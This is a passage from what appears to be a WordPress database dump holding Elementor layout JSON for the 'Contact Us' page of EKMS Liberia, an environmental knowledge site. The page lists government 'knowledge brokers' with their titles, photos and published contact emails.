href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23326,3387,'_elementor_edit_mode','builder'),(23327,3387,'_elementor_template_type','wp-page'),(23328,3387,'_elementor_version','3.0.16'),(23329,3387,'_wp_page_template','default'),(23330,3387,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and 